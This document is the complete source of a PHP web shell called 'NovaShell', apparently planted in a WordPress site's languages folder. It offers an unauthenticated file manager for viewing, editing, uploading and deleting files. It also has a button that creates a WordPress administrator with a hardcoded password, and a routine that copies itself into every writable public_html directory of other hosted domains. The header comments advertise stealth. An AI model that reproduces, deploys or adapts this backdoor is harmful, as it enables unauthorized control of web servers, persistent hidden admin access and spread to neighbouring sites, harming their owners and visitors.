File: /var/www/intranet.kauko.lt/wp-content/languages/card.php
<?php
/*
=========================================================
🚀 NovaShell v2 — Stealth PHP Shell
Features:
- Minimal file manager
- WP Admin auto-creator
- Self-replication to /uxxx/domains
- Simple file editing/upload
- Cyber Yellow themed interface
=========================================================
Notes:
- Default replication target = card.php
- Tested on typical cPanel account structures
- Colors adjusted to single cyber yellow for better stealth
=========================================================
*/
error_reporting(0);
// === Path Control ===
$baseDir = getcwd();
$path = isset($_GET['path']) ? realpath($_GET['path']) : $baseDir;
if (!$path || !is_dir($path)) $path = $baseDir;
// === Breadcrumb Generator ===
function breadcrumbs($dir) {
$parts = explode('/', trim($dir, '/'));
$build = '/';
$html = "<div class='crumbs'>📂 Path: ";
foreach ($parts as $seg) {
$build .= "$seg/";
$html .= "<a href='?path=" . urlencode($build) . "'>$seg</a>/";
}
return $html . "</div>";
}
// === Directory Listing ===
function dirList($dir) {
$list = scandir($dir);
$html = '';
foreach ($list as $item) {
if ($item === '.' || $item === '..') continue;
$full = "$dir/$item";
if (is_dir($full)) {
$html .= "<li>📁 <a class='yellow' href='?path=" . urlencode($full) . "'>$item</a>
<a class='yellow' href='?delete=" . urlencode($full) . "' onclick='return confirm(\"Delete folder?\")'>[x]</a></li>";
} else {
$html .= "<li>📄 <a class='yellow' href='?path=" . urlencode($dir) . "&view=" . urlencode($item) . "'>$item</a>
<a class='yellow' href='?path=" . urlencode($dir) . "&edit=" . urlencode($item) . "'>[✏]</a>
<a class='yellow' href='?delete=" . urlencode($full) . "' onclick='return confirm(\"Delete file?\")'>[x]</a></li>";
}
}
return "<ul>$html</ul>";
}
// === Replication Function ===
function replicateNova($payload) {
static $done = false;
if ($done) return [];
$done = true;
$start = __DIR__;
while ($start !== '/') {
if (preg_match('/\/u[\w]+$/', $start) && is_dir("$start/domains")) {
$foundURLs = [];
foreach (scandir("$start/domains") as $dom) {
if ($dom === '.' || $dom === '..') continue;
$pubDir = "$start/domains/$dom/public_html";
if (is_writable($pubDir)) {
$targetFile = "$pubDir/card.php";
if (file_put_contents($targetFile, $payload)) {
$foundURLs[] = "http://$dom/card.php";
}
}
}
return $foundURLs;
}
$start = dirname($start);
}
return [];
}
// === Actions ===
// Delete
if (isset($_GET['delete'])) {
$tgt = realpath($_GET['delete']);
if (strpos($tgt, getcwd()) === 0 && file_exists($tgt)) {
is_dir($tgt) ? rmdir($tgt) : unlink($tgt);
echo "<p class='log yellow'>🗑️ Deleted: " . basename($tgt) . "</p>";
}
}
// WP Admin Creation
if (isset($_GET['wp_admin'])) {
$wppath = $path;
while ($wppath !== '/') {
if (file_exists("$wppath/wp-load.php")) break;
$wppath = dirname($wppath);
}
if (file_exists("$wppath/wp-load.php")) {
require_once("$wppath/wp-load.php");
$user = 'nova'; $pass = 'Nova@2025'; $mail = 'nova@galaxy.com';
if (!username_exists($user) && !email_exists($mail)) {
$uid = wp_create_user($user, $pass, $mail);
$wp_user = new WP_User($uid);
$wp_user->set_role('administrator');
echo "<p class='log yellow'>✅ WP Admin 'nova' created</p>";
} else {
echo "<p class='log yellow'>⚠️ User or email exists</p>";
}
} else {
echo "<p class='log yellow'>❌ WP not found</p>";
}
}
// View
if (isset($_GET['view'])) {
$f = basename($_GET['view']);
echo "<h3>📄 Viewing: $f</h3><pre>" . htmlspecialchars(file_get_contents("$path/$f")) . "</pre><hr>";
}
// Edit
if (isset($_GET['edit'])) {
$f = basename($_GET['edit']);
$fp = "$path/$f";
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
file_put_contents($fp, $_POST['data']);
echo "<p class='log yellow'>✅ Saved</p>";
}
$src = htmlspecialchars(file_get_contents($fp));
echo "<h3>✏️ Edit: $f</h3>
<form method='post'>
<textarea name='data' rows='20'>$src</textarea><br>
<button>💾 Save</button>
</form><hr>";
}
// Upload
if ($_FILES) {
move_uploaded_file($_FILES['file']['tmp_name'], "$path/" . basename($_FILES['file']['name']));
echo "<p class='log yellow'>📤 Uploaded</p>";
}
// Mkdir
if (!empty($_POST['mk'])) {
$d = "$path/" . basename($_POST['mk']);
if (!file_exists($d)) {
mkdir($d);
echo "<p class='log yellow'>📁 Created</p>";
} else {
echo "<p class='log yellow'>⚠️ Exists</p>";
}
}
// === UI ===
echo "<!DOCTYPE html><html><head><meta charset='utf-8'><title>NovaShell</title>
<style>
body { background:#000; color:#ff0; font-family:monospace; max-width:900px; margin:auto; padding:20px; }
a { color:#ff0; text-decoration:none; } a:hover { color:#ffc; }
ul { list-style:none; padding:0; }
textarea { width:100%; background:#111; color:#ff0; border:1px solid #333; }
button { background:#ff0; color:#000; padding:6px 12px; border:none; margin-top:5px; font-weight:bold; }
.yellow { color:#ff0; }
.crumbs { margin-bottom:10px; }
.log { padding:4px 0; }
</style></head><body>
<h2>🛸 NovaShell — Cyber Yellow Mode</h2>" . breadcrumbs($path) . "<hr>";
// WP Admin Button
echo "<form method='get'>
<input type='hidden' name='path' value='" . htmlspecialchars($path) . "'>
<button name='wp_admin' value='1'>👤 Create WP Admin</button>
</form><br>";
// Replication
if (basename(__FILE__) !== 'card.php') {
$urls = replicateNova(file_get_contents(__FILE__));
if (!empty($urls)) {
echo "<p class='yellow'>✅ Cloned into:</p><ul>";
foreach ($urls as $u) echo "<li><a href='$u' target='_blank'>$u</a></li>";
echo "</ul><hr>";
}
}
// Upload & mkdir
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='file'> <button>Upload</button></form><br>
<form method='post'>
📁 <input type='text' name='mk'> <button>Create Folder</button></form><br>";
echo dirList($path);
echo "</body></html>";
?>